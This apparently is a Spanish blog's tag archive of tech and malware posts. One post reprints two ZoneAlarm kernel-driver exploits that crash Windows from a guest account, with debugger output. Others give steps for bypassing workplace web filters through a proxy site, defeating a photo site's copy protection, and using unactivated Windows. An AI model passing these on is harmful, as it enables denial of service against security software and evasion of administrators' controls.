Entradas etiquetadas con “tecnologia” de Mixelandia

Después de varios acontecimientos que se ha sucitado en estos ultimos dias, me puse a desempolvar los foros que ya tenia instalados, pero que me faltaba configurar. En estos foros habiamos planeado subir algunas cosillas, pero bueno no todo se puede hacer, ni las cosas se dan como uno las planea.
Pero bueno en fin lo más importante es que ya estan de nuevo los foros funcionando, con pocas secciones, de hecho las necesarias para el objetivo que tengo en mente en este momento, que es brindar ayuda a los usuarios con sus probolemas de virus.

También esto obedece a que por ejemplo con el virus del messenger, tube que repetir muchas veces paso a paso de manera personalizada a varias personas que me pidieron que las agregara. Por eso me he decidido a hacer algunas cuantas entradas que iran mostrando paso a paso como realizar de manera general las acciones más comunes para la limpieza de virus o malware.


Todabia falta muchisimo trabajo en lo que a los foros se requiere, pero poco a poco, como el tiempo me lo vaya permitiendo, iremos modificandolos para que queden bien nice ;)


Saludos

Hace algun tiempo escribí una entrada relacionada a algunos errores que tiene myspace, en donde se muestra tu lista de amigos con algunos amigos fantasmas.
Hoy me llegó un corréo (en el buzón de myspace) que mis amigos no han sido borrados, sino todo lo contrareo. Bueno lo último lo puse nomas por ponerlo, pero lo importante es que desde ya hace un buen rato se habia reportado esto. Ellos le hechan la culpa a los usuarios que borran sus perfiles, o a las cuentas que son eliminadas, yo más bien diría que se deben a su mala codificación.

Cuando se diseña una Base de Datos, normalmente si uno se apega a lo que se conoce como normalización, te basas en algo que se llama ID o Identificador, estos son una manera de identificar como su numbre lo indica a cada una de las tuplas (renglones) con los que cuenta una tabla. Una de las utilidades de estos ID's, es que cuando haces tus relaciones, no tienes que juntar muchos datos para poder relacionar a dos datos de diferentes tablas, sino que generas una tercera tabla, la cual tendra dos datos, los ID's de las otras dos tablas que estan relacionadas.

Hace unos momentos estaba yo muy tranquilo chateando con un amigo, y de repente me aparece una conversación de una amiga la cual me manda el siguiente mensaje:

    Moquita Bonita     dice:
oye voy a agregar esa foto a mi blog ya
    Moquita Bonita     envía:

    IMG-0012.zip
 
    Abrir (Alt+P)
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
¿¿??¿?
 
  Has recibido satisfactoriamente C:\Documents and Settings\Administrador\Mis documentos\Mis archivos recibidos\IMG-0012.zip de     Moquita Bonita    .
 
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
y eso que es ???
ha ya se virus

Una compañia ha dejado ver que puede desbloquear los IPhones. Aun no han revelado el costo que esto tendra, pero si el hecho de que tendras licensias, por lo que cada licencia comprada sera un Iphone desbloquedo.

No hace mucho se habian liberado unas instrucciones para desbloquear los iphones de manera manual y con varios chips, el más grande inconveniente con este metodo era el tener que abrir tu iphone nuevo y meterle mano, lo que para muchas personas podria resultar fatal, ya que la mayoria de la gente no solemos soldar o instalar artilugios electronicos.
Hay rumores de que en México la compañia que traera el iphone sera Telcel, lo cual no es de extrañar si tomamos en cuenta que es propiedad del hombre más rico del mundo, el sr Carlos Slim.

Ya solo para terminar les dejo el enlace de esta página en la que podran comprar el software para desbloquear su futuro IPhone.

http://iphonesimfree.com/

Saludos.

Navegando por haí me topé con este pequeño código de html, el cual puede llegar a tronar internet explorer 6, este bug se produce debido a que IE6 no puede manejar correctamente el código malformado que se muestra a continuación:
Al parecer el error se genera en mshtml.dll, que por el nombre parecer ser la encargada del parseo del html.

Si te sientes muy confiado o queieres poner a prueba tu navegador (Firefox esta libre de tal fallo), aqui esta una página la cual explota la vulnerabilidad.
Algo que tenemos que tomar en cuenta es que esta vulnerabilidad no parece ejecutar codigo malicioso.

Saludos y ya no usen el IE6 es rechafa...

En un mes o casi dos cumpliré 25 años o lo que es lo mismo un cuarto de siglo, lo que equivale a muchas experiencias vividas, aun recuerdo aquella primera vez que me enfrente a una computadora, tenia unos 14 o 15 años, en los tiempos en que recién ingresaba al bachillerato, en el CBTIS 89, y fue ahí donde sucedió, entramos al laboratorio de computo, y quede deslumbrado por lo que veían mis ojos, eran una gran cantidad de computadoras, una al lado de la otra formando 4 filas, divididas a la mitad, formando 8 secciones.

Al momento en que entramos, la maestra nos acomodo de una manera alfabética, y yo por se Adame, me toco estar en la máquina número uno.

Todo parecía ir bien hasta el momento en que la maestra nos dijo que prendiéramos la computadora, con lo cual yo quede fuera de lugar. Todos mis compañeros o por lo menos eso percibí yo, sabían como prender aquel maldito aparato del demonio, y yo por mi parte solo me quede con mi carota de what y le dije a la maestra que donde se prendía, no sin recibir una burla colectiva, y la maestra procedió a decirme donde debía de encender la computadora.

Este hecho es bochornoso y no muy agradable, sin embargo va muy bien con el tema de esta entrada. Como algunos saben en el trabajo, tenemos también un cibercafe, el cual nos permite darnos cuanta de algunas cosas que normalmente no vemos.

Algunas veces cuando termina el turno de la chava que no ayuda, que es a las 8 de la noche aproximandamente, me voy a cuidar el ciber mientras me hago tonto un rato y me preparo para irme a casa. Pero esos días en que me quedo puedo ver algunas cosas y entre ellas están unos cuantos niños de no mas de 8 o 7 años, los cuales se la pasan jugando en Internet, saben teclear una pagina de Internet y usar el mouse y el teclado, saben usar el navegador de Internet. Lo interesante de esto es que ellos ni siquiera saben leer, pero están tan acostumbrados a la tecnología que el simple hecho de ver una computadora es algo tan familiar que no los asusta, o les causa cualquier problema con ello.

A donde llegaremos el día de mañana, ¿a una tecnificación total de nuestras vidas, don de los niños aprendan primero a usar aparatos super sofisticados que a leer o sumar?, tal vez o tal vez no, si embargo toso pinta para ello, la tecnología ya esta ahí, ahora solo falta nuestra participación, aunque con cosas como lo de estos niños, parece que estamos en ese camino.

Saludos

Este es uno de los temas con los que de repente la gente llega al blog y creo que es tiempo de decirles claramente como se hace eso o mas bien porque ocurre y como solucionarlo.

Primeramente ¿se ha dañado mi administrador de tareas o es el efecto de algun virus?
No, no se ha dañado tu administrador de tareas y no tampoco es que lo haya afectado un virus, simple y secillamente estas en presencia de una de las "caracteristicas" del administrador de tareas.

ahora ¿cómo le hago para que no se vean los menús o en su caso vuelvan a parecer?
sencillo primero vamos a quitarlos, dando doble click en donde indica el circulito rojo en la siguiente figura:



y como el resultado obtenemos esto:



y ahora para recuperar nuestros menus basta con repetir la opreación, es decir dar doble click en el área marcada de azul en la siguiente pantalla:



y listo tus menus volveran a la normalidad.

Espero y esto les pueda ayudar ;)

Saludos

Alguna vez te has topado con que tu programa o trabajo que habías hecho durante la noche y en el cual invertiste mucho esfuerzo y dedicación. Sin embargo al momento en que decides quemar tu trabajo en un CD o en una memoria USB, y te das cuenta de que tu archivo ya no se puede copiar y te que das así como de Wa Ta Fak osea si lo acabo de guardar alas 3 de la mañana.
Pues si es algo trágico y que sucede con cierta regularidad, tampoco sin llegar a ser el pan nuestro de cada día, pero que ocurre en el momento menos indicado.

Pues bien resulta que un grupo de científicos y gente de Hitachi han descubierto que esto muchas veces se debe a un efecto llamado "Temblor Magnético", el cual se produce cuando el cabezal magnético que lee y escribe al disco duro se desplaza sobre un área del disco y cambia su polaridad. El cambio de polaridad tiene carácter aleatorio y es a este cambio de polaridad lo que llamamos "temblor magnético".
El efecto es tal que puede llegar a parecer un incendio des controlado, en el cual se llegan a producir perdidas de datos.

Y es que solo bastan algunos cuantos nanosegundos, para que todas las áreas cercanas al epicentro, puedan ser arrazadas por el efecto del temblor magnético.

Y lo malo de esto es que formatear el disco duro no ayuda de mucho, puesto que las áreas afectadas pueden perder su efecto magnético, con lo cual quedan marcadas como clusters dañados.
Esperemos que los fabricantes de Discos duros tomen esto en cuenta y comiencen a buscar materiales los cuales no sufran el efecto citado.

Y es que fijense estan por salir discos duros de un Tera Byte, o más bien dicho ya existen, pero el precio no son muy accesibles que digamos los presupuestos de los mexicanos (promedio, porque el señor Carlos Slim se puede dar esos lujos y más), pero que ganariamos si estos empiezan a tener los mismos problemas que tienen los que ya hay.

Cuantas veces has estado en tu trbao o escuela e intentas entrar a un sitio y este esta bloqueado o ha sido prohibido por algun software. Bien esto a nivel administrador de red es fácil de implementar cuando se tiene algun tipo de firewall o proxy transparente, el cual el usuario no sabe que esta usando,y que puede facilmente bloquear ciertos dominios o también algunas direcciones IP e inclusive rangos de estas.
Otra cosa que se puede hacer, pero que es mucho más restrictiva es bloquear el acceso a todas las páginas web, y solo permitir algunas. Si este es tu caso entonces no puedo hacer nada por ti, a menos que supiera exactamente que tienes permitido y que no.

pero si tu caso es el primero en el que solo restringen algunas páginas, entonces vamos por buen camino. Supongamos que te han bloqueado el messenger, y si tratas de usar la dirección del web messenger, o de cualquier otra del mismo tipo, solo te aparece un horrendo mensajito diciendo que la página ha sido bloqueada por el administrador.

Bueno es aquí donde entran los llamados proxys que definiremos a continuación:

En el contexto de las ciencias de la computación, el término proxy hace referencia a un programa o dispositivo que realiza una acción en representación de otro. La finalidad más habitual es la del servidor proxy, que sirve para permitir el acceso a Internet a todos los equipos de una organización cuando sólo se puede disponer de un único equipo conectado, esto es, una única dirección IP.

y una vez que tenemos la wikidefinición ahora daremo una de forma más amigable y que sobre todo es la que vamos usar aquí.

Un proxy tiene como función sevir de ruta alternativa entre un sitio web y tu.
Entendiéndolo de esta manera entonces veamos como funciona de una forma más explicativa.


supongamos que tu te encuentras en la IP 172.16.2.32 de la red de tu empresa y que la IP publica es la 149.32.212.23, bien supongamos que deseas accesar a un servicio que la dirección web es la siguiente http://servicio.com y que la IP de dicho servicio es 153.233.32.63, con eso el Administrador de la red puede bloquear ambos o simplemente bloquear http://servicio.com o la IP.

Ahora supongamos que existe una tercer maquina, la cual tiene la IP 142.25.3.21, la cual tiene instalado un proxy, el cual acepta peticiones en el puerto 80 (que es el default para las paginas web). Ahora lo uni co que tienes que hacer es en vez de teclear http://servicio.con, lo que harás sera entrar ala ip http://142.25.3.21 y una vez ahí meterás la dirección web que deseas visitar. Como tu administrador esta ha bloqueado una ip a la que tu no visitaste o por lo menos no de forma directa, este no se dará cuenta de tu visita a esta.

ahora les dejo esa tercer página la cual sirve de proxy y pueden usar para navegar por todos aquellos lugares que los administradores de redes no quiere que vayas.

http://www.universitylend.info en esta encontraras un pequeño formulario en el que solamente tienes que meter la dirección que quieres visitar y listo.

y para no quedarnos atrás en el lado derecho encontraras un cuadro de texto el cual también te ayudara, puesto que este te redirigirá a un proxy también.

Saludos

Si señores, pues resulta que los que diseñan y mantienen operando metroflog suponen que bloquear el botón derecho es suficiente para evitar que bajes las "Super" fotos que ahí­ se publican, que tienen un alto contenido moral e intelectual.

Pues bien en mi faceta de rompebolas y porque me caga el metro, decidí­ pasarme por el arco del triunfo su "protección" anti robo de fotos.

Primera forma:
entra al estúpido metro de tu elección, navega hasta la pendeja foto que desees y ahora en Internet Explorer 7 vete a opciones de internet, luego en la pestaña de seguridad pulsas el botón que dice nivel personalizado y navegas hacia abajo, hasta encontrar la opción que dice Active Scripting pulsa deshabilitar.




Ya nada mas recarga la púgina y listo puedes usar el botón derecho y descargar la imagen como siempre

nota: al finalizar devuelve el estado original a habilitar, sino no estarú activado el javascript.


Ahora vamos a verlo con FireFox

Al igual que con IE, nos vamos a la foto que buscamos y seleccionamos Herramientas->Opciones...
Luego en la pestaña de contenido, des seleccionamos la opción que dice Activar Java Script




Y ya podemos descargar la imagen, en este caso no es necesario recargar la púgina, ya que Firefox es por mucho mejor que IE.

Ahora veamos otro método, el cual no requiere que modifiques ninguna configuración, simplemente guarda la púgina completa y listo todos los archivos se descargaran, incluyendo las imúgenes.

En FF es Archivo ->Guardar como y selecciona Púgina web Completa.
Ponle el nombre que quieras y también se creara una carpeta con ese nombre, en la cual estarú tu foto
En IE es exactamente lo mismo.


Y por si esto fuera poco aun hay otra opción, la cual consiste en usar la tecla print screen, irse a paint y pegar el contenido del porta papeles.

Adivinen que acaban de hacer, si en efecto copiaron la púgina entera, ya solo recortan su foto y listo.

Aun quedan otras opciones, como modificar el script en tiempo de ejecución, pero es muy freak para que tu usuario de metro flog lo llegues a usar.

Y después de demostrar cómo puedes pirañarse las fotos del el estúpido metrofog, ahora déjame decirte que el hecho de hacer eso no es porque me importe el contenido que hay en ese lugar, sino demostrar como pasarse la estupidez de protección que según ellos colocaron.

Por ultimo quiero expresar mimásgrande repudio a este sitio de Metroflog, el cual encuentro totalmente estúpido y carente de sentido, con contenido tonto y de poco valor para los usuarios de internet, solamente generan spam, con sus fotos que normalmente no dicen nada, no expresan nada relevante, son simplemente idioteces de una mente subdesarrollada, con sueños de llegar a ser alguien en la vida (si lo sé, casi todos los adolecentes estún en esta etapa), pero lo peor del caso es ver que personas profesionistas, o de edad avanzada estún de borregos usando estas redes sociales.

No podemos dejar de lado el tipo de escritura que se usa en esos lugares, los cuales denigran al lenguaje español y en ciertos casos también al inglés, con textos (si es que se les puede decir así­) como este "zta imagn la pongo porqe un amigo me pidio qe pusiera imagenes de las que a el le gustan (goticas) jeje y poes aki sta para qe vea qe si le cumplo... y probablemente ponga mas...
xau le raian chido" que dice esto¿? sinceramente esto esta medio raro.
Por cierto la niña que escribió esto tiene 11 años, lo cual es entendible, pero hay "personas"€ de 20 años omásque escriben de esta forma y pues la verdad es que dan pena.

Ya sinmásy para no andar con pendejadas les dejo esto "Metroflog = a Falta de creatividad para poder generar algo de interés para los demús"

Saludos y no sean maricas, no usen esta mariconada de metroflog

El día de hoy he estado recibiendo muchas conversaciones de personas que utilizan un servicio del tipo de "noteadmito.info", la cual no deja de ser una reverenda pendejada. Veamos en que me baso para decir esto.

Cuando una persona te bloquea en el Messenger, no ocurre ningún cambio en la lista de admitidos, sino en la lista de bloqueados, la cual es privada, es decir nadie más que el propietario de la cuenta tiene acceso a ella.

Pero veamos un poco del proceso de logue en la cuenta del Messenger para poder entender esto.

El primer paso consiste en enviar el correo electrónico, si este existe se recibe un número de identificación, el cual se concatena con el MD5 de la contraseña y se le saca de nuevo el MD5, esto para evitar enviar contraseñas en texto claro, si el usuario es aceptado, se le indica que se conecte ahora a otro servidor y comienza la transferencia de listas.
Si no mal recuerdo son 4 listas, la lista de Amigos, la lista de Admitidos, la lista de personas bloqueadas y por ultimo algo denominado back list que es la lista de personas que te tienen agregado como amigo.

Si nos fijamos bien veremos que el proceso solo, este solo nos permite saber quién nos tiene agregado como amigo, pero no es posible saber si alguien te tiene loqueado.

¿Pero en qué consiste bloquear a alguien? Bien la respuesta es algo confusa y solamente se puede contestar basándose en el proceso. Una vez que se recibe la lista de amigos, en ella viene un campo que nos indica el estado de esa persona, si está o no conectado o esta como ocupado, etc. Ahora esto es en la parte de cliente, pero en la parte del servidor (en live.com) se hace una comparación algo así como esto:

por cada amigo en lista_de_amigos Checa_estado(amigo, yo)

ahora en la función checa_estado(amigo, yo)
si yo en amigo.lista_bloqueados regresa no_conectado
si no regresa amigo.estado

***este proceso solo es demostrativo y no representa la realidad, ya que también entra la opción de solo permitir ver tu estado a las personas que tienes en tu lista de admitidos


como podemos ver es un trabajo 100% en el servidor, y no es posible saber si estamos bloqueados o no, no hay forma de que no podamos saltar esa pequeña encapsulación de datos.

Pero la página me ha dicho que fulano, zutano y perengano me tiene bloqueado...

Si señor la información que te da la pagina no es otra si no la de quien te elimino de su lista de amigos, lo cual es realmente fácil de saber, solo compara tu lista de amigos, con la back list y listo si no aparece en la back list te elimino y por lo tanto no representa que te hayan bloqueado.


¿Pero bien y como hago para saber si alguien me bloqueo?
Pues al igual que en el hacking, en esto de saber quién te bloqueo en el Messenger entra la Ingeniería Social, la cual es una de las herramientas más potentes que existen.
Veamos cómo es esto:
Lupe tiene agregado a Juan y Pedro
Juan también tiene agregado a Pedro
un día Juan se enoja con Lupe y la bloquea, Lupe trata de saber si la bloquearon o no y recurre a las famosas páginas esas y encuentra que Juan no la bloqueo, sin embargo un día se conecta Pedro.
Lupe le pregunta alguna que otra tontería, y por no dejar le dice que si ha visto a Juan últimamente, a lo que Pedro le contesta "mmm si ahorita está conectado".
Lupe solo contesta ha si ya lo vi gracias y en ese momento sabe que Juan si la tiene bloqueada.

Así funciona esto y no se dejen sorprender por esas páginas que muy posiblemente les estén robando sus contraseñas o agregando sus correos a listas de spam.

Saludos y no se dejen engañar

Asi es, creo que me estoy volviendo todo un experto en el manejo de esta herramienta. con este "pequeño" proyecto con el que tenemos ya bastante trabajando, he usado muchas de las opciones que tiene y ahora con cada cambio de datos, me toma mucho menos tiempo el realizarlos. Aunque lo lamento por la maquina de Miguel, que la tengo trabajando a todo lo que da, y hoy que no estaba en la oficina, la que lo llevo fue mi pobresita laptop, pero aguanto bien y saco el trabajo... ahora solo me queda descansar el resto del fin del domingo y ver el partido de México

Aveces es bueno saber si nuestro sitio va por el buen camino o no y para poder seguirle el curso a nuestro sitio les traigo esta página que predice el pageRank de tu sitio, esto es meramente especulatorio hay que aclararlo, pero no deja de ser una buena guia para saber si has tenido avances y si seguiras subiendo o no en la próxima revisión de google.



Según me infamaron la siguiente vez que google ajstara el pageRank sera en septiembre de este año, con lo que quedan algunos meses para poder mejorar y seguir ganando back links no creen.

Suerte y espero que esta herramienta les de buenas noticias como a mi. Según esto mi pagina tendrá un pagerank de 4, y eso para mi es muy bueno, recordemos que entre más alto se a tu pagerank google te toma mas en cuenta al momento de las búsquedas, por lo cual apareces mas y hay mas visitas a tu web.

el sitio en cuestion es este http://www.iwebtool.com/pagerank_prediction

Saludos

Después de algunos días no haber podido dedicarle tiempo al este programita, este fin de semana me puse a finalizar lo que a mi punto de vista es la versión 1.7.

El cambio aqu mas me tardo es el hecho de que ya no uso los forms de delphi, lo que hizo que el tamaño del programa se redujera en mucho, pasando a solo unos cuantos kilos (63kilobytes), reduciendo también con esto el uso de memoria RAM y más recurso del sistema.

Otra cosa que le agregue fue que ahora mientras el programa se este ejecutando, al momento de conectar una memoria esta es analizada (y limpiada en caso de ser necesario) en forma automática.

Tambien le puse que al momento de minimizar la ventana se agrega a la barra de iconos de notificación.

Hice alunas limpiezas y mejoras en el código fuente, por lo cual también se redujo el tamaño del ejecutable.


Lo que bien es introducir una hoja de opciones, hacer que el programa se instale como servicio (si que se inicie estomáticamente con windows pero con los privilegios mas elevados).

también un menú y mas cosillas pero eso sera con tiempo y un poco de deificación, por mientras aquí les dejo la versión mas reciente del USBCleaner

Descargar

agregado: listado y desganchado de Shadow SSDT
agregado: nuevo dialogo de acerca ;)
el sistema de actualización es ahora completamente configurable.
remivido: el banneo a GMER y el banneo a los debuggers de modo kernel

PandaLabs ha descubierto DreamSystem, un sistema para controlar varias variantes de la

familia de bots DreamSocks. la versión 1.3 de esta herramienta es la ultima que se conoce

y esta siendo vendida en varios foros por alrededor de 750 dollares. Por el dinero pagado

se incluyen actualizaciones gratuitas de nuevas versiones.

La herramienta consta de dos partees, La primera permite a los ciber-delincuentes controlar las maquinas comprometidas, convirtiéndolas en servidores, ingresando una URL en los bots,esto es para que se conecten a ella y comiencen a recibir ordenes. La segunda parte es la parte que permite enviar las ordenes a esas maquinas infectadas. Esta ultima ha sido encontrada en muchos foros, lo cual indica que hay varias botnet controladas por esta herramienta.

Los bots controlados mediante DreamSystem permiten que el atacante las convierta en zombies y también las utilice como servidores. Además también permite que el bot descargue y ejecute cualquier tipo de archivos, incluyendo otros códigos maliciosos.

En los foros donde se ha encontrado esta herramienta, esta se esta utilizando para lanzar ataques de Delegación de Servicio Distribuidos(DDoS por sus siglas en ingles) en contra de Servidores web. Esto puede ser en dos protocolos:UDP y TCP.

Los Ciber-delincuentes usan estos ataques para bloquear los servicios proporcionados por compañías que basan sus servicios en internet, -con las perdidas que esto acarrea-, si no pagan una cantidad para detener el ataque.


Las técnicas utilizadas para distribuir estas variantes de los bots van desde la utilización de exploits para infectar la maquina de usuarios, como Mpack o enviando spam con el bot como contenido.

Los hackers han desarrollado una nueva forma de engañar alos usuarios y que descarguen malware desde un sitio de descarga apocrifo de Adobe Shockwave Player.

la forma en que operan estos sitios es mostrando iconos especialmente formados, para hacer creer al usuario que su copia de Shockwave (si es que se encuentra instalado) no esta funcionando correctamente.

Todos los links apuntan a otro sitio el cual da un "diagnostico del problema", hay que actualizar el macromedia flash player. El usuario es redirigido a un sitio que se hacer pasar por el Centro de descarga del hockwave Player.

Por supuesto la descarga es un troyano, en vez del popular Flash player. Entre las características del sitio podemos encontrar que deshabilita el botón derecho del mouse.

Con la utilización de ingeniería social, en vez de utilizar permanentemente vulnerabilidades, tales como el iFrame en internet explorer, los hackers extienden los rangos de sus posibles víctimas.

Como la ven apoco no se ve bien nice esta imagen en un cajero automatico. Yo me pregunto si algo como esto inspiraria confianza al momento de realizar una operación bancaria.

Pero bueno el otro dia descubri como utilizar una computadora sin activar, jeje con la ayuda del buen internet explorer y un poco de imaginación se puede lanzar el shell (exploerer.exe) y listo a usar la compu sin que este activada, nomas que silencio no le digan a nadie que yo les dije.

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí

ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


Y aquí esta el analisis de este BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Otro exploit con la misma técnica para el mismo firewall.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


Esto lleva inmediatamente a un BSOD


analisis en windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.


Saludos
EP_X0FF/UG North

Programas antivirus de varias compañías de nivel mundial han fallado en la mayor prueba de malware la VB100

Los productos de Kaspersky, Grisoft, y F-Secure han fallado en detectar el 100% del malware que se encuentran en la base de datos de Virus Bulletin, anqué en alguna ocasión ya habían pasado esta prueba.

De los 37 productos probados, 10 fallaron al momento de demostrar sus habilidades de detección necesitarías para obtener la certificación VB100.

Kaspersky Anti-Virus 6.0.2.621 fallo en detectar el gusano de internet llamado allaple. De acuerdo con el consultor de tecnología de Kaspersky, David Emm, Kaspersky había agregado la firma para el gusano en Febrero. Sin embargo al momento de la prueba, Kaspersky se encontraba "optimizando" la firma del allape, y la firma no se encontraba en la base de datos de Kaspersky.

Grisoft AVG 7.5 professional Edition también fallo en el VB100. AVG es una aplicación antimalware gratuita muy conocida, que tiene una gran aceptación.

Larry Bridwellm el estratega general de seguridad de Grisoft, dijo que la parte de este anti-malware, AVG 7.5 Professional Edition, que detecta firmas ha fallado al detectar una de las variantes del Troyano Agobot, pero que la parte anti-spyware del producto lo había detectado. "Las pruebas son al momento de accesar los archivos a nivel hardware" comento Bridwell. Cuando se probo el AVG 7.5 Professional Edition, encontramso el bot en la parte del anty spyware, la cual es sobre demanda [el programa tiene que iniciarse de forma manual]. Deberíamos de haber detectado el malware al momento del acceso.

Al igual que Kaspersky el servicio de protección para clientes de F-Secure (7.00 buil 387) fallo al detectar el Allaple. La compañía dijo que había cometido un error al no enviar las últimas actualizaciones de su base de datos. "El producto enviado a la prueba no incluía las ultimas actualizaciones", comentó F-Secure. "El programa que probado off line, lo cual no permitió al programa actualizarse a la ultima versión en la base de datos. En el ambiente del usuario normal la base de datos se hubiera actualizado de manera automática.

Todas estas pruebas fueron realizadas en Windows XP.

Hoy les traigo otro exploit el cual tiene que ver con Rootkit Revealer, es una traducción directa del texto publicado por EP_X0FF en los foros de sysinternals aquí
nota:
Solamente usenlo si realmnente saben lo que hacen...

Rootkit Revelaler (RKR) es un detector de Rookits muy conocido el cual es usado para revelar algunos rootkits de modo usuario así como algunas cuantas cosas del modo kernel.

Puede detectar archivos ocultos haciendo lecturas de modo RAW y usando su propio parser para el sistema de archivos. Puede detectar entradas ocultas en el registro volcando directamente desde el disco por medio de un driver y la función ZwSaveKey y utilizando su propio parser para esto.

Existen varias maneras de sobrepasar completamente a RKR, pero el detector mismo puede ayudarte a sobrepasarlo. Esta vulnerabilidad esta presente en todas las versiones de RKR inclusive en las más antiguas versiones de línea de comando.

